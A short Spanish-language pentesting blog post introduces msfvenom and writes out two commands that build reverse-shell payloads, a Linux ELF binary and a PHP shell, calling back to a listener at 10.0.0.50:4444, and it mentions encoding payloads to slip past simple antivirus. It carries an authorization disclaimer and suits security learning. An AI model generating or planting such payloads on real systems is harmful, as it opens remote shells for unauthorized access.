~ / blog / pentesting
KALI

Payloads con msfvenom

msfvenom fabrica el payload que le entregas a la víctima, en el formato que necesites.

Le das el tipo de shell, tu IP y puerto de escucha, y el formato de salida: un binario de Linux, un php, un script de python, o un war para un servidor Java. También puede codificarlo para evadir antivirus simples.

El payload se conecta de vuelta a tu Metasploit. Es la fábrica de munición del pentester.

Solo en laboratorios o con autorización.

# los comandos

kali@kali:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.50 LPORT=4444 -f elf -o shellcopiar
Payload size: 74 bytes
Saved as: shell
kali@kali:~$ msfvenom -p php/reverse_php LHOST=10.0.0.50 LPORT=4444 -f raw -o shell.phpcopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.